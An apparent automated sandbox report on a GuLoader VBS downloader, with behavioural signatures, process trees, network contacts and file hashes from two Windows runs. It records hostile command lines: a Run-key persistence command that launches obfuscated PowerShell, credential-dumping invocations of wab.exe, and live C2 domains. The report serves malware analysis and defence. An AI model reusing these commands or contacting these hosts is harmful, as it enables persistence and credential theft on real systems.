Malware Analysis Report

2024-10-18 23:09

Sample ID 240521-sc1t5ahg83
Target 5b18edcdf179f15d71defecce070f15b472cb8e2f41f57ef771059f3d0571e66
SHA256 5b18edcdf179f15d71defecce070f15b472cb8e2f41f57ef771059f3d0571e66
Tags
guloader collection downloader persistence
Score 10/10


Analysis Overview

Score 10/10

SHA256

5b18edcdf179f15d71defecce070f15b472cb8e2f41f57ef771059f3d0571e66

Threat Level: Known bad

The file 5b18edcdf179f15d71defecce070f15b472cb8e2f41f57ef771059f3d0571e66 was found to be: Known bad.

Malicious Activity Summary

guloader collection downloader persistence

Guloader, Cloudeye

NirSoft WebBrowserPassView

Nirsoft

NirSoft MailPassView

Blocklisted process makes network request

Checks computer location settings

Accesses Microsoft Outlook accounts

Adds Run key to start application

Suspicious use of SetThreadContext

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of NtSetInformationThreadHideFromDebugger

Enumerates physical storage devices

Modifies registry key

Suspicious behavior: MapViewOfSection

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Runs ping.exe

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-21 14:59

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-21 14:59

Reported

2024-05-21 15:02

Platform

win10v2004-20240508-en

Max time kernel

149s

Max time network

149s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5b18edcdf179f15d71defecce070f15b472cb8e2f41f57ef771059f3d0571e66.vbs"

Signatures

Guloader, Cloudeye

downloader guloader

NirSoft MailPassView

Description Indicator Process Target
N/A N/A N/A N/A

NirSoft WebBrowserPassView

Description Indicator Process Target
N/A N/A N/A N/A

Nirsoft

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Accesses Microsoft Outlook accounts

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts C:\Program Files (x86)\windows mail\wab.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Antodontalgic = "%Peritenon% -w 1 $Intermorainic=(Get-ItemProperty -Path 'HKCU:\\Sojaskraaets\\').Afdryp;%Peritenon% ($Intermorainic)" C:\Windows\SysWOW64\reg.exe N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Enumerates physical storage devices

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2528 wrote to memory of 2276 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2528 wrote to memory of 2276 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2276 wrote to memory of 2348 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 2276 wrote to memory of 2348 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 2528 wrote to memory of 3488 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2528 wrote to memory of 3488 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3488 wrote to memory of 4208 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 3488 wrote to memory of 4208 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 3488 wrote to memory of 3300 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 3488 wrote to memory of 3300 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 3488 wrote to memory of 3300 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 3300 wrote to memory of 4428 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3300 wrote to memory of 4428 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3300 wrote to memory of 4428 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3300 wrote to memory of 3044 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3300 wrote to memory of 3044 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3300 wrote to memory of 3044 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3300 wrote to memory of 3044 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3300 wrote to memory of 3044 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3044 wrote to memory of 1624 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 3044 wrote to memory of 1624 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 3044 wrote to memory of 1624 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 1624 wrote to memory of 1412 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1624 wrote to memory of 1412 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1624 wrote to memory of 1412 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3044 wrote to memory of 5072 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3044 wrote to memory of 5072 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3044 wrote to memory of 5072 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3044 wrote to memory of 856 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3044 wrote to memory of 856 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3044 wrote to memory of 856 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3044 wrote to memory of 2764 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3044 wrote to memory of 2764 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3044 wrote to memory of 2764 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3044 wrote to memory of 2764 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3044 wrote to memory of 4532 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3044 wrote to memory of 4532 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3044 wrote to memory of 4532 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3044 wrote to memory of 4532 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3044 wrote to memory of 4508 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3044 wrote to memory of 4508 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3044 wrote to memory of 4508 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3044 wrote to memory of 3692 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3044 wrote to memory of 3692 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3044 wrote to memory of 3692 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3044 wrote to memory of 3692 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5b18edcdf179f15d71defecce070f15b472cb8e2f41f57ef771059f3d0571e66.vbs"

C:\Windows\System32\cmd.exe

cmd.exe /c ping 6777.6777.6777.677e

C:\Windows\system32\PING.EXE

ping 6777.6777.6777.677e

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe


C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Droh.Lit && echo t"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe


C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Droh.Lit && echo t"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Antodontalgic" /t REG_EXPAND_SZ /d "%Peritenon% -w 1 $Intermorainic=(Get-ItemProperty -Path 'HKCU:\Sojaskraaets\').Afdryp;%Peritenon% ($Intermorainic)"

C:\Windows\SysWOW64\reg.exe

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Antodontalgic" /t REG_EXPAND_SZ /d "%Peritenon% -w 1 $Intermorainic=(Get-ItemProperty -Path 'HKCU:\Sojaskraaets\').Afdryp;%Peritenon% ($Intermorainic)"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\nobtnhuqqxsvaxybxuzgbthktkatecctdk"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\nobtnhuqqxsvaxybxuzgbthktkatecctdk"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\nobtnhuqqxsvaxybxuzgbthktkatecctdk"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\pqoeos"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\zltxokpmsn"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\zltxokpmsn"

Network

Country Destination Domain Proto
US 8.8.8.8:53 6777.6777.6777.677e udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 madibarohilalatwo.duckdns.org udp
DE 84.247.187.12:80 madibarohilalatwo.duckdns.org tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 12.187.247.84.in-addr.arpa udp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
NL 23.62.61.160:443 www.bing.com tcp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 160.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 cadenaderegalos.com udp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 8.8.8.8:53 125.68.49.198.in-addr.arpa udp
US 8.8.8.8:53 11.97.55.23.in-addr.arpa udp
US 8.8.8.8:53 odogwuvisual123.duckdns.org udp
SG 206.123.138.32:6767 odogwuvisual123.duckdns.org tcp
US 8.8.8.8:53 32.138.123.206.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
SG 206.123.138.32:6767 odogwuvisual123.duckdns.org tcp
US 8.8.8.8:53 geoplugin.net udp
NL 178.237.33.50:80 geoplugin.net tcp
US 8.8.8.8:53 50.33.237.178.in-addr.arpa udp
US 8.8.8.8:53 194.142.123.92.in-addr.arpa udp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp

Files

memory/3488-0-0x00007FFE80CF3000-0x00007FFE80CF5000-memory.dmp

memory/3488-1-0x0000021A4F9B0000-0x0000021A4F9D2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ixc22uig.iqd.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Roaming\Droh.Lit

MD5 1a958060ba3e3de4653959fe2fd1efd5
SHA1 c5d3a5646dc5920668f1f61c334c7c7d40c888b5
SHA256 268dacbaea80bdf0e4ffcbcf21ce4558988d4c77f2906d571a5a1b9db9dc17ab
SHA512 8ba4e481b0a08940a5423abc5d1e7ffa01e4aa185536af215a43e5d28ee025f5caf5355514b2a13f0565c42796e1bd864104878d79d086a82648b0733929c5d0

C:\Users\Admin\AppData\Local\Temp\nobtnhuqqxsvaxybxuzgbthktkatecctdk

MD5 18b6368b183e546a35847ae24b4b2913
SHA1 040545f7ac2c987d2a79b5e7f1cf9ab83bd25923
SHA256 54c101b6b1241b6a0574a66e5a5b9bddc6c60a4daf7338dba6fe3f65b27382af
SHA512 68ba8734016705cd12bf9d7ce41d5c823b2ec6ce9ee1ee7e9da9efcd9c88ef1f1b18148d91ad6a271c7a88d4ca098a99198ca709fcf217f9b1fa18f74c48d698

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-21 14:59

Reported

2024-05-21 15:02

Platform

win7-20240221-en

Max time kernel

147s

Max time network

152s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5b18edcdf179f15d71defecce070f15b472cb8e2f41f57ef771059f3d0571e66.vbs"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Windows\CurrentVersion\Run\Antodontalgic = "%Peritenon% -w 1 $Intermorainic=(Get-ItemProperty -Path 'HKCU:\\Sojaskraaets\\').Afdryp;%Peritenon% ($Intermorainic)" C:\Windows\SysWOW64\reg.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 596 set thread context of 2468 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2240 wrote to memory of 1676 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 1676 wrote to memory of 1208 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 2240 wrote to memory of 2360 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 1416 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2360 wrote to memory of 596 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 596 wrote to memory of 516 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 596 wrote to memory of 2468 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2468 wrote to memory of 1348 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 1348 wrote to memory of 2872 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5b18edcdf179f15d71defecce070f15b472cb8e2f41f57ef771059f3d0571e66.vbs"

C:\Windows\System32\cmd.exe

cmd.exe /c ping 6777.6777.6777.677e

C:\Windows\system32\PING.EXE

ping 6777.6777.6777.677e

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Droh.Lit && echo t"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Droh.Lit && echo t"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Antodontalgic" /t REG_EXPAND_SZ /d "%Peritenon% -w 1 $Intermorainic=(Get-ItemProperty -Path 'HKCU:\Sojaskraaets\').Afdryp;%Peritenon% ($Intermorainic)"

C:\Windows\SysWOW64\reg.exe

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Antodontalgic" /t REG_EXPAND_SZ /d "%Peritenon% -w 1 $Intermorainic=(Get-ItemProperty -Path 'HKCU:\Sojaskraaets\').Afdryp;%Peritenon% ($Intermorainic)"

Network

Country Destination Domain Proto
US 8.8.8.8:53 6777.6777.6777.677e udp
US 8.8.8.8:53 madibarohilalatwo.duckdns.org udp
DE 84.247.187.12:80 madibarohilalatwo.duckdns.org tcp
US 8.8.8.8:53 cadenaderegalos.com udp
US 198.49.68.125:443 cadenaderegalos.com tcp

Files

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FNPSN90E19EQJP9QN7PC.temp

MD5 bc28d4197085ba776631dfb6b5a2a087
SHA1 e0949021a788b0fc103a4862ba9eb37f710d84f1
SHA256 03f800e75edc2a12cf107debf20d86f1dc67b7d244ff94656f13a96415f9ff50
SHA512 225a7583ca4bb8214cb9a5fe8cdab943d8eedcf480aa9c8d669fb9fe975d4e214163d7ac9f659ea25f22fe31d22d7d4dc8d58f9e75a7d6e92f13ef08bf104659

C:\Users\Admin\AppData\Roaming\Droh.Lit

MD5 1a958060ba3e3de4653959fe2fd1efd5
SHA1 c5d3a5646dc5920668f1f61c334c7c7d40c888b5
SHA256 268dacbaea80bdf0e4ffcbcf21ce4558988d4c77f2906d571a5a1b9db9dc17ab
SHA512 8ba4e481b0a08940a5423abc5d1e7ffa01e4aa185536af215a43e5d28ee025f5caf5355514b2a13f0565c42796e1bd864104878d79d086a82648b0733929c5d0
